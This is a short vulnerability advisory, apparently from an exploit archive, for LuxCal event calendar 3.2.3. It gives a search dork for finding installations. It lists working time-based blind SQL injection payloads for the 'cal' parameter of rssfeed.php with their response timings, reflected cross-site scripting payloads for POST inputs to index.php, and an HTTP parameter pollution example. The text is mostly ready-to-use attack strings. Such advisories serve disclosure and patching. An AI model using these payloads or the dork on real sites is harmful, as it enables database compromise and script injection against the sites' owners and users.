facebook facebook twitter rss

luxcal event calendar 3.2.3 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
luxcal event calendar 3.2.3 Multi Vulnerability
====================================
Author : indoushka
Vondor : www.LuxSoft.eu
Dork : powered by LuxSoft
======================================

Blind SQL Injection :

This vulnerability affects luxcal/rssfeed.php
URL encoded GET input cal was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed:
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 4.024 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.062 s
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 6.021 s
(select(0)from(select(sleep(2)))v)/*'+(select(0)from(select(sleep(2)))v)+'"+(select(0)from(select(sleep(2)))v)+"*/ => 2.106 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.062 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.016 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 4.009 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.031 s

Original value: mycal

Cross site scripting (verified) :

URL encoded POST input cC%5b%5d was set to 0' onmouseover=prompt(966491) bad='
The input is reflected inside a tag parameter between single quotes.

URL encoded POST input cU%5b%5d was set to 0" onmouseover=prompt(934961) bad="
The input is reflected inside a tag parameter between double quotes.

This vulnerability affects /index.php

HTTP parameter pollution :

URL encoded POST input cC%5b%5d was set to 0&n921288=v953538
Parameter precedence: last occurrence
Affected link: rssfeed.php?cal=mycal&cC%5B%5D=0&n921288=v953538
Affected parameter: cal=mycal

Like us on Facebook :